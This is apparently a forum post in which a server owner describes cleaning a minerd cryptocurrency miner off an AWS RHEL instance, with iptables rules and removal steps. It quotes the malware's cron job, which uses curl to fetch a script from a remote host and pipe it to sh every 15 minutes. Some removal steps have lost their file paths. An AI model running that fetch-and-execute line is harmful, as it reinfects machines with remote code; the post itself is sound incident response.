I have an AWS EC2 instance running RHEL 7.2 which seems to have been hacked by a BitCoin CPU Miner. When I run
ps -eo pcpu,args --sort=-%cpu | head, it shows that there is a CPU miner that’s taking up more than 90% of CPU utilization. ?
I found the solution to removing
minerd. I was lucky enough to find the actual script that was used to infect my server. All I had to do was remove the elements placed by this script –
- On monkeyoto‘s suggestion, I blocked all communication with the mining pool server –
iptables -A INPUT -s xmr.crypto-pool.fr -j DROPand
iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
- Removed the cron
*/15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0706 | shfrom
- Removed the directory
- Deleted the files
- Stopped the minerd process –
service lady stop.
ps -eo pcpu,args --sort=-%cpu | head,
top -bn2 |sed -n '7,25'p and
ps aux | grep minerd after that and the malware was nowhere to be seen.
I still need to figure out how it gained access into the system but I was able to disable it this way.